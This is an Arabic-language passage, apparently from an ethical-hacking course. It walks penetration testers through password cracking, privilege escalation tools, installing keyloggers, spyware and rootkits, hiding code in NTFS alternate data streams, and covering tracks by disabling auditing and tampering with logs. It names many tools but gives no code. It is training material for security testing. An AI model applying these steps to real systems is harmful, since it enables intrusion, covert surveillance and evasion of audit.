اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك MRU-Blaster .ﯾﻌﺎﻟﺞ ﺑﺄﻣﺎن ﺗﻧظﯾف "اﻟﻣﺳﺎرات اﻟﻣﺳﺗﺧدﻣﺔ" و ﻏﯾرھﺎ ﻣن اﻟﻣﺧﻠﻔﺎت اﻟﺗﻲ ﺗﺗرﻛﮭﺎ ﻣﻌظم اﻟﺑراﻣﺞ
وراءھﺎ.
أدوات ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ) (Track covering toolsﯾﺣﻣﻲ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء ﺗﺻﻔﺢ اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك
ﻋن طرﯾﻖ ﺗﻧظﯾف ﺟﻣﯾﻊ اﻟﻣﺳﺎرات ﻣن أﻧﺷطﺔ اﻹﻧﺗرﻧت ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ﺗﻔرغ ذاﻛرة اﻟﺗﺧزﯾن اﻟﻣؤﻗت ،ﺣذف ﻣﻠﻔﺎت اﻟﻛوﻛﯾز ،ﺗﻔرغ
Internet historyاﻟﺗﻲ ﺗﺷﺎرك اﻟﻣﻠﻔﺎت اﻟﻣؤﻗﺗﺔ ،ﺣذف ﺳﺟﻼت ،وﺗﺟﺎھل اﻟﻐﯾر اﻟﻣرﻏوب ﻓﯾﮫ .وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ھذه اﻷدوات ﻋﻠﻰ
اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
Wipe available at http://privacyroot.com
Tracks Eraser Pro available at http://www.acesoft.net
BleachBit available at http://bleachbit.sourceforge.net
Absoluteshield Internet Eraser Pro available at http://www.internet-track-eraser.com
Clear My History available at http://www.hide-my-ip.com
EvidenceEraser available at http://evidence-eraser-pro.en.softonic.com
WinTools.net Professional available at http://www.wintools.net
RealTime Cookie & Cache Cleaner (RtC3) available at http://www.kleinsoft.co.za
AdvaHist Eraser available at http://advahist-eraser.software.informer.com
Free Internet Window Washer available at http://www.eusing.com
ﻛﻣﺧﺗﺑر اﻻﺧﺗراق ،ﯾﺟب ﺗﻘﯾﯾم اﻟوﺿﻊ اﻷﻣﻧﻲ ﻟﻠﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻧظﺎم .ﻟﺗﻘﯾﯾم اﻷﻣن ،ﯾﺟب أن ﺗﺣﺎول ﻛﺳر أﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋن
طرﯾﻖ ﻣﺣﺎﻛﺎة ھﺟﻣﺎت ﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﻧظﺎم ،ﺗﻣﺎﻣﺎ ﻣﺛل ﻣﺎ ﯾﻘوم ﺑﮫ اﻟﻣﮭﺎﺟم .ھﻧﺎك ﺑﻌض اﻟﺧطوات اﻟﺗﻲ ﺗﺣﺗﺎج ﻟﻣﺗﺎﺑﻌﺔ إﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق
اﻟﻧظﺎم .وﺳﯾﻛون ھذا اﻟﻘﺳم ﯾﻌﻠﻣك ﻛﯾﻔﯾﺔ إﺟراء ﻧظﺎم اﻟﻘرﺻﻧﺔ ﻛﺎﺧﺗﺑﺎر اﻻﺧﺗراق.
Password Cracking
ﻓﻲ ﻣﺣﺎوﻟﺔ ﻻﺧﺗراق ﻧظﺎم ،اﻟﻣﮭﺎﺟم ﯾﺣﺎول ﻓﻲ اﻟﺑداﯾﺔ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم ،إن وﺟدت .وﺑﺎﻟﺗﺎﻟﻲ ،ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق ،ﯾﺟب ﻋﻠﯾك
أﯾﺿﺎ ﻣﺣﺎوﻟﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم .ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ،اﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ:
-اﻟﺨﻄﻮة :1ﺗﺤﺪﯾﺪ ﻧﻈﺎم ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﺤﻤﯿﺔ )(Identify password protected systems
اﻟﺗﻌرف ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف اﻟذي ﯾﺣﺗﺎج إﻟﻰ ﺗﻘﯾﯾم أﻣﻧﻰ .ﺑﻣﺟرد اﻟﺗﻌرف ﻋﻠﻰ اﻟﻧظﺎم ،ﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﻟدﯾك ﺣﻖ اﻟوﺻول إﻟﻰ ﻛﻠﻣﺔ اﻟﻣرور،
وھذا ﯾﻌﻧﻲ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺧزﻧﺔ .إذا ﻟم ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور ،ﻓﻣﺣﺎول ﺗﻧﻔﯾذ اﻟﻌدﯾد ﻣن اﻟﮭﺟﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻟﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور واﺣدة ﺗﻠو
اﻷﺧرى ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف.
-اﻟﺨﻄﻮة :2ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻘﺎﻣﻮس )(Perform a dictionary attack
ﺗﻧﻔﯾذ ھﺟوم اﻟﻘﺎﻣوس ﻋن طرﯾﻖ ﺗﺣﻣﯾل ﻣﻠف اﻟﻘﺎﻣوس إﻟﻰ ﺗطﺑﯾﻖ اﻟﻛﺳﯾر واﻟذي ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﺿد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن .ﺗﺷﻐﯾل ﺗطﺑﯾﻖ اﻟﻛﺳر
وﻣراﻗﺑﺔ اﻟﻧﺗﺎﺋﺞ .إذا ﻛﺎن اﻟﺗطﺑﯾﻖ ﺳﻣﺢ ﻟك ﻟﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم ،ﻓﮭذا ﯾﻌﻧﻲ أن ﻣﻠف اﻟﻘﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر .إذا ﻟم ﺗﻛن ﻗﺎدرا
ﻋﻠﻰ ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم ،ﻓﺣﺎول ﻣرة أﺧرى ﻣﻊ ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور اﻷﺧرى.
-اﻟﺨﻄﻮة :3إﺟﺮاء اﻟﺘﺠﺴﺲ ﻋﻠﻰ أﺳﻼك اﻟﺸﺒﻜﺔ )(Perform wire sniffing
ﺗﺷﻐﯾل أدوات اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﻟﻠوﺻول وﺗﺳﺟﯾل ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ اﻟﺧﺎم اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺷﻣل ﻛﻠﻣﺎت اﻟﺳر اﻟﻣرﺳﻠﺔ إﻟﻰ
اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة.
-اﻟﺨﻄﻮة :4ﺗﻨﻔﯿﺬ اﻟﮭﺠﻮم اﻟﻘﺎﺋﻢ ﻋﻠﻰ ﻗﻮاﻋﺪ )(Perform a rule-based attack
ﻣﺣﺎوﻟﺔ اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ إﺟراء اﻟﮭﺟوم اﻟﻣﺳﺗﻧد إﻟﻰ اﻟﻘﺎﻋدة.
-اﻟﺨﻄﻮة :5ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻤﻘﻄﻊ )(Perform a syllable attack
ﻣﺣﺎوﻟﺔ اﺳﺗﺧراج ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ إﺟراء ھﺟوم .syllableھذا اﻟﮭﺟوم ھو ﻣزﯾﺞ ﻣن ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )(brute force attack
وھﺟوم اﻟﻘﺎﻣوس). (dictionary attack
Privilege Escalation
ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻛﻠﻣﺎت ﻣرور اﻟﻧظﺎم ،ﻓﺎﻧﮫ ﺳوف ﯾﺣﺎول ﺗﺻﻌﯾد اﻣﺗﯾﺎزاﺗﮫ إﻟﻰ ﻣﺳﺗوى اﻟﻣﺳؤول ﺑﺣﯾث ﯾﻣﻛن ﺗﺛﺑﯾت اﻟﺑراﻣﺞ أو
اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ،وﺑﺎﻟﺗﺎﻟﻲ ﺑﺈﻣﻛﺎﻧﮫ اﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻣن اﻟﻧظﺎم .ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق ،ﯾﺟب ﻋﻠﯾك
اﺧﺗراق اﻟﻧظﺎم ﻛﻣﺳﺗﺧدم ﻋﺎدي ﺛم ﻣﺣﺎوﻟﺔ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك .وﻓﯾﻣﺎ ﯾﻠﻲ اﻟﺧطوات ﻟﺗﻧﻔﯾذ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز:
-اﻟﺨﻄﻮة :1ﺣﺎول ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﺑﺎﺳﺘﺨﺪام أﺳﻤﺎء اﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﺘﻲ ﺗﻢ ﺗﻌﺪادھﺎ وﻛﻠﻤﺎت اﻟﻤﺮور اﻟﺘﻲ ﺗﻢ ﻛﺴﺮھﺎ
ﺑﻣﺟرد ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ،ﺣﺎول ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳﺗﺧدام ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن أﺟل اﻟوﺻول إﻟﻰ اﻟﻧظﺎم .اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن
ﯾﺗم ﺗﻘﯾﯾد اﻣﺗﯾﺎزات ﺗﺳﺟﯾل اﻟدﺧول .إذا ﻛﺎن اﻟﺟواب ﺑﻧﻌم ،ﻓﺣﺎول ﺗﺷﻐﯾل اﻟﺧدﻣﺎت واﻟﺣﺳﺎﺑﺎت اﻟﻣﺣروﻣﺔ ﻣن اﻻﻣﺗﯾﺎزات.
-اﻟﺨﻄﻮة :2ﺣﺎول ﺗﺸﻐﯿﻞ اﻟﺨﺪﻣﺎت وﺣﺴﺎﺑﺎت اﻟﻤﺤﺮوﻣﯿﻦ )(unprivileged account
ﻗﺑل ﻣﺣﺎوﻟﺔ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك ،ﺣﺎول ﺗﺷﻐﯾل اﻟﺧدﻣﺎت وﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﻟدﯾك أذوﻧﺎت ﻟﺗﺷﻐﯾل اﻟﺧدﻣﺎت أم ﻻ .إذا ﻛﻧت ﺗﺳﺗطﯾﻊ
ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ،ﺛم اﺳﺗﺧدام أدوات ﺗﺻﻌﯾد اﻣﺗﯾﺎز ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات رﻓﯾﻌﺔ اﻟﻣﺳﺗوى.
-اﻟﺨﻄﻮة :3اﺳﺘﺨﺪام أدوات ﺗﺼﻌﯿﺪ اﻻﻣﺘﯿﺎزات
اﺳﺗﺧدام أدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز ﻣﺛل ،Offline NT Password Registry Editor ،Active@ Password Changer
،Elcomsoft System Recovery ،Windows Password Recovery Tool ،Windows Password Reset Kit
،Windows Password Recovery Bootdisk ،Trinity Rescue Kitاﻟﺦ .ھذه اﻷدوات ﺳوف ﺗﺳﺎﻋدك ﻋﻠﻰ ﻛﺳب اﻣﺗﯾﺎزات
ذات ﻣﺳﺗوى أﻋﻠﻰ.
Executing Application
ﻣﺧﺗﺑر اﻻﺧﺗراق ﯾﺟب ﻋﻠﯾﮫ ﻓﺣص أﻧظﻣﺔ اﻟﮭدف ﻋن طرﯾﻖ ﺗﻧﻔﯾذ ﺑﻌض اﻟﺗطﺑﯾﻘﺎت ﻣن أﺟل ﻣﻌرﻓﺔ اﻟﺛﻐرات اﻟﻣوﺟودة ﻓﻲ اﻟﻧظﺎم .ﻓﯾﻣﺎ ﯾﻠﻲ
اﻟﺧطوات ﻟﻠﺗﺣﻘﻖ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋﻧد اﺧﺗﯾﺎر ﺑﻌض اﻟﺗطﺑﯾﻘﺎت ﻟﯾﺗم ﺗﻧﻔﯾذھﺎ ﻟﺗﺣدﯾد اﻟﺛﻐرات.
-اﻟﺨﻄﻮة :1اﻟﺘﺤﻘﻖ ﻣﻦ ﺗﺜﺒﯿﺖ ﻣﻜﺎﻓﺢ اﻟﻔﯿﺮوﺳﺎت ﻋﻠﻰ اﻟﻨﻈﺎم اﻟﮭﺪف
اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف وإذا ﻛﺎﻧت ﻣﺛﺑﺗﺔ ،اﻟﺗﺣﻘﻖ ﻣن أﻧﮭﺎ ﻣﺣدﺛﮫ ﻟﺗﺎرﯾﺦ اﻟﯾوم أم ﻻ.
-اﻟﺨﻄﻮة :2اﻟﺘﺤﻘﻖ ﻣﻦ ﺗﺜﺒﯿﺖ ﺟﺪار ﺣﻤﺎﯾﺔ واﻟﺒﺮاﻣﺞ اﻟﻤﻀﺎدة Keyloggingﻋﻠﻰ اﻟﻨﻈﺎم اﻟﮭﺪف
اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﺗم ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ ال Keyloggingأم ﻻ.
-اﻟﺨﻄﻮة :3اﻟﺘﺤﻘﻖ ﻣﻦ ﻧﻈﺎم اﻷﺟﮭﺰة
ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ﯾﺗم ﺗﺄﻣﯾن اﻷﺟﮭزة ﻓﻲ ﺑﯾﺋﺔ ﻣؤﻣﻧﺔ.
-اﻟﺨﻄﻮة :4اﺳﺘﺨﺪام ﻛﯿﻠﻮﺟﺮز
ﻣﺣﺎوﻟﺔ ﺗﺛﺑﯾت واﺳﺗﺧدام ﻛﯾﻠوﺟرز ﻋﻠﻰ اﻟﻧظﺎم ﻣن أﺟل ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ .اﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻛﯾﻠوﺟرز ﻣﺛل ،Spytech SpyAgent
،Advanced Keylogger ،Powered Keylogger ،All In One Keyloggerاﻟﺦ.
-اﻟﺨﻄﻮة :5اﺳﺘﺨﺪام spyware
ﺣﺎول ﺗﺛﺑﯾت واﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻧظﺎم ﻣن أﺟل رﺻد اﻷﻧﺷطﺔ ﻋﻠﻰ اﻟﻧظﺎم .اﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺛل SoftActivity TS
،SPYPhone GOLD ،Mobile Spy ،WebCam Recorder ،Spy Voice Recorder ،Monitorاﻟﺦ.
-اﻟﺨﻄﻮة :6اﺳﺘﺨﺪام أدوات ﻟﻠﺘﻨﻔﯿﺬ ﻋﻦ ﺑﻌﺪ
ﻣﺣﺎوﻟﺔ ﺗﺛﺑﯾت واﺳﺗﺧدام أدوات ﻟﻠﺗﻧﻔﯾذ ﻋن ﺑﻌد.
Hiding Files
اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑت rootkitsﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﺧﻔﻲ ﻟﻠﻧظﺎم .ﯾﺟب ﻋﻠﯾك اﺗﺑﺎع ﺧطوات ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﻠﻛﺷف ﻋن اﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ
ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف.
-اﻟﺨﻄﻮة :1ﺗﺜﺒﯿﺖ rootkit
أوﻻ ﺣﺎول ﺗﺛﺑﯾت rootkitﻓﻲ اﻟﻧظﺎم اﻟﻣﺳﺗﮭدف ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﺧﻔﻲ.
-اﻟﺨﻄﻮة :2ﺗﻨﻔﯿﺬ ﺗﻘﻨﯿﺎت اﻟﻜﺸﻒ اﻟﻘﺎﺋﻢ ﻋﻠﻰ اﻟﺴﻼﻣﺔ )(Perform integrity-based Detection techniques
ﻗم ﺑﺗﻧﻔﯾذ اﻟﻛﺷوﻓﺎت اﻟﺗﺎﻟﯾﺔ،cross-view-based detection ،signature-based detection ،integrity-based detection :
heuristic detection techniquesﻟﻠﻛﺷف ﻋن .rootkit
-اﻟﺨﻄﻮة :3اﺳﺘﺨﺪام ﺑﺮاﻣﺞ ﻣﻜﺎﻓﺤﺔ rootkits
اﺳﺗﺧدام anti-rootkitsﻣﺛل ،Rootkit Buster ،Virus Removal Tool ،UnHackMe ،Stingerوﻣﺎ إﻟﻰ ذﻟك ﻟﻛﺷف ﻋن
.rootkits
-اﻟﺨﻄﻮة :4اﺳﺘﺨﺪام )NTFS Alternate Data Streams (ADSs
اﺳﺗﺧدام ) NTFS Alternate Data Streams (ADSsﻟﺣﻘن اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ ﻧظﺎم اﻟﻣﺧﺗرق وﺗﻧﻔﯾذه دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ ﻣن
ﻗﺑل اﻟﻣﺳﺗﺧدم.
-اﻟﺨﻄﻮة :5اﺳﺗﺧدامNTFS stream detectors
اﺳﺗﺧدام NTFS stream detectorsﻣﺛل ،Streams ،ADS spy ،StreamArmorوﻣﺎ إﻟﻰ ذﻟك ﻟﻛﺷف ﻋن .NTFS-ADS streams
-اﻟﺨﻄﻮة :6اﺳﺘﺨﺪام ﺗﻘﻨﯿﺔ إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت
اﺳﺗﺧدام ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ داﺧل رﺳﺎﻟﺔ ﻋﺎدﯾﺔ واﺳﺗﺧراﺟﮭﺎ ﻓﻲ اﻟوﺟﮭﺔ ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳرﯾﺔ اﻟﺑﯾﺎﻧﺎت.
اﻟﺧطوة :7اﺳﺗﺧدام اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت
اﺳﺗﺧدام أدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ،Stego Suite ،Xstegsecret ،Gargoyle Investigator” Forensic Pro
،Stegdetectوﻣﺎ إﻟﻰ ذﻟك ﻷداء .Steganalysis
Covering Tracks
ﯾﺟب ﻋﻠﻰ ﻣﺧﺗﺑر اﻻﺧﺗراق ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات وذﻟك ﻣن ﺧﻼل ﻣﺣﺎﻛﺎة ھﺟوم ﻹﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق .ﻟﻠﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾﻣﻛن ﺗﻐطﯾﺔ ﻣﺳﺎرات
اﻟﻧﺷﺎط اﻟﺧﺎص ﺑك ،ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ:
-اﻟﺨﻄﻮة :1إزاﻟﺔ ﻣﺴﺎرات اﻟﻨﺸﺎط ﻋﻠﻰ ﺷﺒﻜﺔ اﻹﻧﺘﺮﻧﺖ
أوﻻ ،إزاﻟﺔ ﻣﺳﺎرات اﻟﻧﺷﺎط ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ،MRUاﻟﻛوﻛﯾز ،temporary files ،cache ،و.history
-اﻟﺨﻄﻮة :2ﺗﻌﻄﯿﻞ اﻟﺘﺪﻗﯿﻖ )(audit
ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﻌطﯾل اﻟﺗدﻗﯾﻖ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮭﺎ .ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل. Auditpol
-اﻟﺨﻄﻮة :3اﻟﻌﺒﺚ ﻣﻊ ﻣﻠﻔﺎت اﻟﺴﺠﻞ
ﻣﺣﺎوﻟﺔ ﻟﻠﻌﺑث ﻣﻊ ﻣﻠﻔﺎت اﻟﺳﺟل ﻣﺛل proxy log files ،server log files ،event log filesﻣﻊ log poisoningاو .log flooding
-اﻟﺨﻄﻮة :4اﺳﺘﺨﺪام أدوات ﺗﻐﻄﯿﺔ اﻟﻤﺴﺎرات
اﺳﺗﺧدام أدوات ﺗﻐطﯾﺔ اﻟﻣﺳﺎر ﻣﺛل ،Clear My History ،Tracks Eraser Pro ،Wipe ،MRU-Blaster ، CCleanerاﻟﺦ.
-اﻟﺨﻄﻮة :5ﺣﺎول ﻏﻠﻖ ﻛﺎﻓﺔ اﻻﺗﺼﺎﻻت ﻋﻦ ﺑﻌﺪ إﻟﻰ اﻟﺠﮭﺎز اﻟﻀﺤﯿﺔ
-اﻟﺨﻄﻮات :6ﺣﺎول ﻏﻠﻖ أي ﻣﻦ اﻟﻤﻨﺎﻓﺬ اﻟﻤﻔﺘﻮﺣﺔ